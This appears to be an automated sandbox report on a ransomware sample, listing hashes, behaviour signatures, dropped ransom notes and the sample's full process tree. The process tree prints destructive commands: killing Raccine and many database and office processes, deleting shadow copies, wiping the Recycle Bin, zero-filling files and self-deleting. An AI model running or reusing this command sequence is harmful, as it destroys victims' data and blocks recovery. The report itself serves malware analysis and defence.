Resubmissions

21/08/2024, 19:30

240821-x76q3sweqg 10

21/08/2024, 17:42

240821-v92h2avgpj 10

12/06/2024, 16:01

240612-tgps4a1bqh 10

Analysis

  • max time kernel
    1439s
  • max time network
    1440s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2024, 17:42

General

  • Target

    Mydoom Ransomwares/1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

  • Size

    127KB

  • MD5

    93a7ed73f2245a1f043b74e724705f54

  • SHA1

    6b97b4cd5d44e607540b841081f68b7755ce59f5

  • SHA256

    1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406

  • SHA512

    ab1d5999d7bdeb0a2d93a7476cbcace92971417d45a7459fbe294ed66d0466f0e121a68fe9ade89c3c71d4afab3b81b94aaaeabc99e6f02f79c307acbf574090

  • SSDEEP

    3072:bhADm5OPINYUsx0Ki6uA9bKHtBdQex7Coy5q5l:bhAcO7xhjuA9bQQzq

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Renames multiple (224) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 4 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 6 IoCs
  • Drops file in Program Files directory 56 IoCs
  • Drops file in Windows directory 28 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 48 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
    "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1180
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2980
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete HKCU\Software\Raccine /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry key
      PID:2944
    • C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /DELETE /TN "Raccine Rules Updater" /F
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2804
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config Dnscache start= auto
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2796
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config FDResPub start= auto
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1956
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SSDPSRV start= auto
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2988
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2816
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config upnphost start= auto
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2732
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2756
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:3000
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLWriter start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:940
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SstpSvc start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1420
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2860
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2868
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2928
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1156
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1728
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2216
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2220
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2640
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1112
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2524
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1948
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2508
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1292
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1768
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:756
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1232
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      PID:1572
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2316
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2612
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1932
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1708
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2896
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1180
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1224
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2400
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2068
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2052
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1140
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:660
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1900
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2404
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2060
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:884
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2080
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:812
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2044
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:848
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1048
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:1408
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:2884
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.7 -n 3
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1436
      • C:\Windows\SysWOW64\fsutil.exe
        fsutil file setZeroData offset=0 length=524288 “%s”
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2860
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2120
      • C:\Windows\SysWOW64\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1096

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.secure[[email protected]]

    Filesize

    180KB

    MD5

    d5aac1acc567bbce4c152c48194e8868

    SHA1

    19ab73648d09a503200cdd1dc2c37efa88c9babc

    SHA256

    15b9ea1c507b406ad74f4f701614705e623731aca7d96134018dfa2bd0607007

    SHA512

    8d3b368ab175e65d51c8a99ae339d45c3c8f6f855b8e668555b2fde915d992293bb03903dfa5eb7cf59780eb6521d098b6b84ed45d02686f2e2b6bff0b56c656

  • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

    Filesize

    1KB

    MD5

    fa938778040d7c10af75e116e383690b

    SHA1

    ab6e0799be7fae1bce29c6d3265ea3a233747a18

    SHA256

    a5511f41b0de92c4089794b742cc0b59c6c21f874e10c266c33e0c5b4bfb187e

    SHA512

    34c9604c480e8c17366846c4df3010ccc664d11d12a485621d6446b31026675d14225e4ac7bfedb756ca805247d1185dcec43c6413303228a14397dab5cfca40

  • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

    Filesize

    913B

    MD5

    ab400c6a76ff1def6b2f3f34c89fa050

    SHA1

    48315d41f1b416519638b8be8633a2bd9829518c

    SHA256

    160e6ed14518e5bf79c59d2d42f8f9d10a2ec649b41e82f488a68051187b6079

    SHA512

    3b30ee667071dc4d10bc30285290490cdeb87bedee93f75859adfbdcfa3b74f04ab993cb94e723138e620c118849abd737a1a809ce8cf1663082095f62f918dc

  • memory/1976-0-0x000000007471E000-0x000000007471F000-memory.dmp

    Filesize

    4KB

  • memory/1976-1-0x00000000011B0000-0x00000000011D6000-memory.dmp

    Filesize

    152KB

  • memory/1976-2-0x0000000074710000-0x0000000074DFE000-memory.dmp

    Filesize

    6.9MB

  • memory/1976-235-0x000000007471E000-0x000000007471F000-memory.dmp

    Filesize

    4KB

  • memory/1976-473-0x0000000074710000-0x0000000074DFE000-memory.dmp

    Filesize

    6.9MB

  • memory/1976-489-0x0000000074710000-0x0000000074DFE000-memory.dmp

    Filesize

    6.9MB